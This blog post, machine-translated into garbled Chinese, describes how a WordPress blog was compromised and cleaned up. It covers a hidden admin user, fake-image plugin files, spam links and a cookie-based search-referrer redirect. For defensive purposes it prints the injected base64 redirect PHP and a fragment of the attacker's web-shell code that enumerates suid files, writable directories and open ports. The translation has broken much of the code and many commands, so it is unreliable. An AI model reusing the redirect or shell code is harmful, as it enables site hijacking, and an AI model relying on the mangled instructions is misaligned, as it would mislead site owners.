该博客引起了错误...但对我来说,你有吗?

在过去的一个月中,我已经收到了警告 病毒的博客 在一些游客。 起初,我忽略了警告,因为我安装了一个相当不错的防病毒(Kaspersky AV 2009的),虽然很长一段时间的博客,我从来没有得到病毒警报(..我看到了可疑的东西,第一次刷新消失。最后...)。
慢慢开始出现大的变化 访客流量后交通最近一直在稳步下降,并开始被越来越多的人告诉我,谁, stealthsettings.com 这是 病毒之。 我昨天收到从别人做的截图,当防病毒堵住了 脚本 的stealthsettings.com:木马Clicker.HTML.IFrame.gr的。 这是相当有说服力的给我,我把所有源搜索。 来到我的脑海的第一个想法是做 升级 最新版本的 WordPress (2.5.1),而不是以前的老脚本删除WordPress的所有文件,使 备份数据库。 这个过程一直不成功,可能会用了很长的时间来弄清楚它烧开,如果我会说SEMA 边喝咖啡边讨论,他发现 谷歌,这将是很好看他。
MyDigitalLife.info,发表了一篇题为:“WordPress的哈克:恢复和修复谷歌搜索引擎或无Cookie的流量重定向到你的Needs.info,AnyResults.Net金Info.net和其他非法网站“这就是我所需要的线程结束。
这是关于一个 利用 基于WordPress的饼干,我认为这是非常复杂的,言书。 聪明足以让 SQL注入 数据库的博客, 创建一个不可见的用户 一个简单的例行检查 控制面板 - >用户, 检查服务器“可写的目录和文件” (用chmod 777的),寻求和 执行 文件的root用户或组的权限。 我不知道谁剥削的名称和看他写的文章,有几个尽管许多博客被感染,包括罗马尼亚。 好吧...我会尽量尝试解释泛泛的病毒。

是什么病毒?

首先,将源页面的博客,游客看不见,但可见的和可转位的搜索引擎,尤其是谷歌的链接。 如此 把网页排名的网站的攻击者表示。 其次,插入 重定向代码 URL,雅虎,谷歌,现场为游客来自或RSS阅读器,而不是网站 饼干。 一 杀毒软件 检测重定向 木马Clicker.HTML的.

症状:

大规模游客流量下降特别是其中大部分游客来自谷歌的博客。

鉴别: (因此成了问题,谁也不知道如何如何的phpmyadmin,PHP和Linux)

LA。 注意! 首先做一个备份的数据库!

1。 查看源文件 的index.php, header.php文件, footer.php文件博客话题,看看是否有一个代码,使用加密 base64 或包含“如果($ SER ==”1·&& sizeof($ _COOKIE)的== 0)“的形式:

<?PHP的
$ Seref =阵列(“谷歌”,“MSN”,“活”,“AltaVista的”,
“问”,“雅虎”,“美国在线”,“CNN”,“天气”,“Alexa的”);
$ SER = 0;的foreach($ $ Seref文献)
如果(strpos(用strtolower
($ _SERVER ['HTTP_REFERER']),$ REF)!== FALSE){$ SER =“1;打破;}
($服务==“1?&&大小($ _COOKIE)== 0){头(人:”位置“。base64_decode(”YW55cmVzdWx0cy5uZXQ =')'/')退出;
}>

或者什么的。 删除此代码!

点击图片...

指数代码

在上面的截图中,我选择了错误,“<?的腓get_header();?>”。 该代码应维持不变。

2。 使用 phpMyAdmin的 并去到数据库表 wp_users凡检查,如果没有创建的用户名 00:00:00 0000-00-00 (可能的放置 用user_login 写“WordPress的”。 写这个用户ID(域ID),然后将其删除。

点击图片...

假用户

*绿线应该除掉,并保留了他的身份证。 的情况下 ID = 8 .

3。 转到表 wp_usermeta,在哪里 位于 被称为 消除 线的编号(在该字段 USER_ID 删除ID值出现)。

4。 在表 wp_optionactive_plugins 和插件启用嫌疑。 它可以用来像结局 _old.giff,_old.pngg _old.jpeg,_new.php.giff扩展组合_old和_new假的图像。

SELECT * FROM wp_options WHERE的option_name ='active_plugins

删除这个插件,然后去博客 - >“面板 - >插件,停用和激活某个插件。

点击图片出现active_plugins病毒文件。

插入

按照路径上的FTP或SSH在active_plugins表示从服务器删除该文件。

5。 在phpMyAdmin,表 wp_option,查找并删除行“rss_f541b3abd05e7962fcab37737f40fad8“而在”internal_links_cache“.
在internal_links_cache的加密的垃圾链接出现在您的博客和 谷歌的Adsense代码黑客。

6。 推荐 更改密码 博客和登录 删除所有可疑userele。 升级到最新版本的WordPress的博客设置不允许新用户注册。 有没有损失,无法发表评论和不合逻辑的。

我试图解释上述有些什么,做什么在这样的情况下,来清洁这种病毒博客。 更严重的问题是比它似乎难以解决,所使用的 安全漏洞 Web服务器托管,这是博客。

具有访问权限的安全性,作为第一项措施 SSH的,在服务器上进行一些检查,看看是否有任何文件,如_old *和* _new *结局。吉夫,JPEG,pngg。jpgg。 必须将这些文件删除。 如果重命名文件,例如。 top_right_old.giff in top_right_old.php我们可以看到,该文件是完全的攻击代码服务器。

检查,清洁和安全服务器的一些有用的迹象。 (通过SSH)

1. CD / tmp目录 并检查是否有文件夹,如 tmpVFlma 或其他组合有相同的名称,并删除它。 请看下面的截图,从我的两个这样的文件夹:

tmpserver

使用rm-rf文件夹

2。 尽可能文件夹属性,检查elimiati(CHMOD变化) CHMOD 777的

找到所有可写的文件在当前目录: 查找。 型F烫发2-LS
在当前目录中找到所有可写目录: 查找。 D型烫发2 LS
发现在当前目录中所有可写目录和文件: 查找。 彼尔姆2 LS

3。 寻找可疑文件服务器上的。

查找。 名称“* _new.php *”
查找。 名称“* _old.php *”
查找。 名称“*。Jpgg”
查找。 名称“* _giff”
查找。 名称“* _pngg”

4, 注意! 的文件将被置位 SUID si SGID. 这些文件的用户(组)或根,而不是执行文件的用户的权限执行。 这些文件会导致根妥协,如果安全问题。 如果您使用的文件的SUID和SGID位,执行“CHMOD 0“ 或卸载包包含。

利用包含在源某处...:

(安全模式){
(操作系统类型=='nix的'的){
$ OS =执行('kern.ostype的sysctl-N');
OS。=执行(sysctl的-N kern.osrelease的);
$ OS =执行('kernel.ostype的sysctl-N');
OS。=执行(sysctl的-N kernel.osrelease的);
如果(空(用户))$ USER =执行(“ID”);
别名=阵列(
“=>”,
'查找'=>'找到/型F-烫发04000 ls'的suid文件,
'查找'=>'找到sgid文件/型F-烫发02000'',
“查找所有可写的文件在当前目录'=>'找到。 型F-烫发2'',
'寻找当前目录'=>'找到所有可写目录中。 型D-烫发2'',
“查找所有可写目录和文件在当前目录'=>'找到。 彼尔姆2''
“显示打开的端口'=>'NETSTAT-| grep的,我听',
);
} {
$ OS_NAME使用。=执行('版本');
用户。=执行(“回声%用户名%');
别名=阵列(
“=>”,
“显示乳宁服务'=>'网络启动”
'显示进程列表'=>'任务列表“
);
}

在这种方式...基本上发现的安全漏洞。 端口打开目录“可写”和组执行权限的文件/根。

返回更多...

感染一些博客: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro /博客,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

,Www.artistul.ro /博客/

www.mirabilismedia.ro /博客,Blog.einvest.ro
......这样的例子不胜枚举......很多。

你可以检查,如果博客是病毒,使用谷歌搜索引擎。 复制和粘贴:

网站www.blegoo.com采购

晚安,提高工作;)不久,我会想出更新尤金 prevezibil.imprevizibil.com.

BRB :)

:注意! 更改WordPress主题或升级到WordPress的2.5.1,不是一个解决办法摆脱这种病毒。

该博客引起了错误...但对我来说,你有吗?

关于作者

隐形

热爱这些小工具,并将其写入2006的欣然stealthsettings.com,我喜欢去发现与你有关计算机和MacOS,Linux和Windows中,iOS和Android的新的东西的一切。

发表评论